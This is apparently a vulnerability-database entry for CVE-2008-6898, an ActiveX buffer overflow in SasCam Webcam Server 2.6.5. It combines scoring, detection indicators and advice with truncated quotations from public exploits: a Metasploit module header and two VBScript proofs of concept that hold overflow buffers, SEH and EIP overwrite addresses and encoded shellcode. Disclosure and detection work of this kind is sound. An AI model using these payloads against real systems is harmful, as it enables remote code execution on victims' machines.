CVE-2008-6898
published 2009-08-05CVE-2008-6898: Buffer overflow in the XHTTP Module 4.1.0.0 in the ActiveX control for SaschArt SasCam Webcam Server 2.6.5 allows remote attackers to cause a denial of service…
PriorityP352critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
31.74%
98.1th percentile
Buffer overflow in the XHTTP Module 4.1.0.0 in the ActiveX control for SaschArt SasCam Webcam Server 2.6.5 allows remote attackers to cause a denial of service (crash) or execute arbitrary code via a long argument to the Get method and other unspecified methods.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| saschart | sascam_webcam_server | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
EIP return address: 0x77E37EEC (call esp, User32.dll)
bytes↗
SEH overwrite nseh: %eb%06%90%90 (short jump + NOPs)
bytes↗
SEH overwrite seh: 0x72D1204E (msacm32.drv)
bytes↗
Heap-spray return address: 0x0c0c0c0c
- →Detect exploitation attempts by monitoring for ActiveX Get() method calls with arguments exceeding 8293 bytes (buffer size used in PoC exploits). ↗
- →Detect SEH-based exploitation variant using a buffer of 8349 'A' bytes followed by SEH overwrite pattern targeting msacm32.drv gadget at 0x72D1204E. ↗
- →The ActiveX control is not marked safe for scripting; monitor for instantiation of the SasCam XHTTP ActiveX control (XHTTP Module 4.1.0.0) in browser processes. ↗
- →Heap spray pattern using 0x0c0c0c0c as return address is characteristic of the Metasploit module for this CVE; look for this value in memory or network-delivered HTML. ↗
- →Payload delivery is via a crafted HTML file; monitor for HTML files containing unescape() heap-spray patterns combined with ActiveX Get() method invocations. ↗
- ·The EIP overwrite ROP gadget (call esp in User32.dll at 0x77E37EEC) is specific to a particular Windows/DLL version and will not be reliable across different patch levels. ↗
- ·The SEH overwrite gadget (0x72D1204E in msacm32.drv) and the heap-spray return address (0x0c0c0c0c) are both tested only on Windows XP SP3 with IE 7; exploitation on other targets requires different offsets. ↗
- ·Payload space is limited to 1024 bytes with null bytes as bad characters; shellcode must be encoded accordingly. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
SasCam Webcam Server 2.6.5 - 'Get()' Method Buffer Overflow (Metasploit)
exploitdb·2010-09-25
CVE-2008-6898 SasCam Webcam Server 2.6.5 - 'Get()' Method Buffer Overflow (Metasploit)
SasCam Webcam Server 2.6.5 - 'Get()' Method Buffer Overflow (Metasploit)
---
##
# $Id: sascam_get.rb 10477 2010-09-25 11:59:02Z mc $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'SasCam Webcam Server v.2.6.5 Get() method Buffer Overflow',
'Description' => %q{
The SasCam Webcam Server ActiveX control is vulnerable to a buffer overflow.
By passing an overly long argument via the Get method, a remote attacker could
overflow a buffer and execute arbitrary code on the system with the privileges
of the user. This control is not marked safe for
Exploit-DB
SasCam WebCam Server 2.6.5 - ActiveX Overwrite (SEH)
exploitdb·2010-07-03
CVE-2008-6898 SasCam WebCam Server 2.6.5 - ActiveX Overwrite (SEH)
SasCam WebCam Server 2.6.5 - ActiveX Overwrite (SEH)
---
'SEH Overwrite exploited by Blake
'Original EIP method by callAX
'Tested on XP SP3/IE7 in virtualbox
'$ nc 192.168.1.155 4444
'Microsoft Windows XP [Version 5.1.2600]
'(C) Copyright 1985-2001 Microsoft Corp.
'
'C:\Documents and Settings\blake\Desktop>
buffer = String(8349, "A")
nseh = unescape("%eb%06%90%90") ' short jump
seh = unescape("%4E%20%D1%72") ' 0x72D1204E [msacm32.drv]
nops = String(20, unescape("%90")) ' nop sled
junk = String(2000, "C")
sc = unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%4f%49%49%49%49%49") & _
unescape("%49%51%5a%56%54%58%36%33%30%56%58%34%41%30%42%36") & _
unescape("%48%48%30%42%33%30%42%43%56%58%32%42%44%42%48%34") & _
unescape("%41%32%41%44%30%41%44%54%42%44%51%42%30%41%44%41") & _
unescape("%56%58%3
Exploit-DB
SasCam WebCam Server 2.6.5 - ActiveX Remote Buffer Overflow
exploitdb·2008-12-29
CVE-2008-6898 SasCam WebCam Server 2.6.5 - ActiveX Remote Buffer Overflow
SasCam WebCam Server 2.6.5 - ActiveX Remote Buffer Overflow
---
Sub rootIT()
put_s0m3_shit = String(8293, "a")
eip = unescape("%EC%7E%E3%77") // call esp User32.dll Module 77 E3 7E EC
noping = String(20, unescape("%90"))
lnj3ctc0d3 = unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%4f%49%49%49%49%49") & _
unescape("%49%51%5a%56%54%58%36%33%30%56%58%34%41%30%42%36") & _
unescape("%48%48%30%42%33%30%42%43%56%58%32%42%44%42%48%34") & _
unescape("%41%32%41%44%30%41%44%54%42%44%51%42%30%41%44%41") & _
unescape("%56%58%34%5a%38%42%44%4a%4f%4d%4e%4f%4c%56%4b%4e") & _
unescape("%4d%54%4a%4e%49%4f%4f%4f%4f%4f%4f%4f%42%56%4b%48") & _
unescape("%4e%56%46%32%46%32%4b%38%45%44%4e%53%4b%58%4e%37") & _
unescape("%45%30%4a%57%41%30%4f%4e%4b%48%4f%34%4a%51%4b%58") & _
unescape("%4f%35%42%52%41%50%4b%4e%49%
Metasploit
SasCam Webcam Server v.2.6.5 Get() Method Buffer Overflow
metasploit
SasCam Webcam Server v.2.6.5 Get() Method Buffer Overflow
SasCam Webcam Server v.2.6.5 Get() Method Buffer Overflow
The SasCam Webcam Server ActiveX control is vulnerable to a buffer overflow. By passing an overly long argument via the Get method, a remote attacker could overflow a buffer and execute arbitrary code on the system with the privileges of the user. This control is not marked safe for scripting, please choose your attack vector carefully.
No writeups or analysis indexed.
http://www.exploit-db.com/exploits/14195http://www.securityfocus.com/bid/33053https://exchange.xforce.ibmcloud.com/vulnerabilities/47654https://www.exploit-db.com/exploits/7617http://www.exploit-db.com/exploits/14195http://www.securityfocus.com/bid/33053https://exchange.xforce.ibmcloud.com/vulnerabilities/47654https://www.exploit-db.com/exploits/7617
2009-08-05
Published